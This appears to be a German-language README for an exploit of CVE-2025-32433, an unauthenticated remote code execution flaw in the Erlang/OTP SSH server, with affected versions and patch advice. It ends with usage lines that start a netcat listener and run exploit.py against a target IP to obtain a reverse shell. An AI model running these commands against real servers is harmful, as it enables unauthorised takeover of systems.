
CVE-2025-32433 Zusammenfassung und Angriffsübersicht
CVE-2025-32433 Zusammenfassung und Angriffsübersicht
CVE-2025-32433 ist eine kritische, nicht authentifizierte Remote-Codeausführungs-Schwachstelle (RCE) im Erlang/OTP SSH-Server, die am 16. April 2025 veröffentlicht wurde. Erlang/OTP SSH ist eine Bibliothek, die in verschiedenen verteilten und Telekommunikationsanwendungen verwendet wird. Der Fehler entsteht durch eine unsachgemäße Behandlung von SSH-Protokollnachrichten: Der Server setzt die normale Authentifizierungssequenz nicht durch, sodass ein Angreifer vor der Authentifizierung speziell gestaltete SSH-Nachrichten senden kann. Dadurch kann der Angreifer beliebigen Erlang-Code auf dem Server einschleusen und ausführen nvd.nist.gov offsec.com . In der Praxis bedeutet dies, dass ein Angreifer mit Netzwerkzugriff auf einen anfälligen Erlang/OTP SSH-Server (der oft als Root läuft) eine Reverse-Shell auslösen oder Befehle ohne Anmeldedaten ausführen kann, was zu einer vollständigen Systemkompromittierung führt nvd.nist.gov offsec.com . Diese Schwachstelle hat einen CVSS-Score von 10.0 (maximale Schwere) offsec.com .
Betroffen sind alle Erlang/OTP-Versionen unterhalb von OTP-27.3.3, OTP-26.2.5.11 oder OTP-25.3.2.20 (die gepatchten Versionen) nvd.nist.gov offsec.com . Betroffene Systeme umfassen häufig Linux-Server oder -Geräte, die einen Erlang-basierten SSH-Daemon ausführen (nicht zu verwechseln mit OpenSSH). Wichtig: Standard-OpenSSH-Server unter Linux/BSD sind nicht anfällig offsec.com . Benutzer sollten davon ausgehen, dass jeder exponierte Erlang/OTP SSH-Server betroffen ist, und umgehend die offiziellen Patches anwenden oder den SSH-Dienst deaktivieren.
Der Angriff funktioniert, indem eine SSH-Verbindung initiiert und dann eine Sequenz von SSH-Nachrichten außer der Reihe gesendet wird. :
Verwendung:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
Bsp.:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555